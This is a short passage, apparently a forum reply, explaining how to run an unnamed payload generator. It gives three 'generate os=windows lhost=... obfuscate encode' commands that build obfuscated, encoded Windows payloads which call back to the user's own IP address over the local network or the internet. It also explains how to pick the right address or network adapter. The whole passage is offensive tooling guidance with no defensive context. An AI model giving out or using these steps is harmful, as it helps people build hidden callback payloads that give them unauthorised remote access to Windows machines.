you have to use your IP. To see it you can use ifconfig (Linux), if you have windows I think it was ipconfig, or if you want to get the IP automatically you can use wlan0 or eth0 as host, also i recommend you to use obfuscation. You can use this commands:

• generate os=windows lhost=IP obfuscate encode (change IP to your IP, if you are doing it locally, use your private IP and if you are running it over the internet use your public IP)
• generate os=windows lhost=wlan0 obfuscate encode (if you want to use it locally and you are using WiFi)
• generate os=windows lhost=eth0 obfuscate encode (if you want to use it locally and you are using Ethernet)

Also your adapter could not be wlan0 or eth0, you can check it using ifconfig or ipconfig.
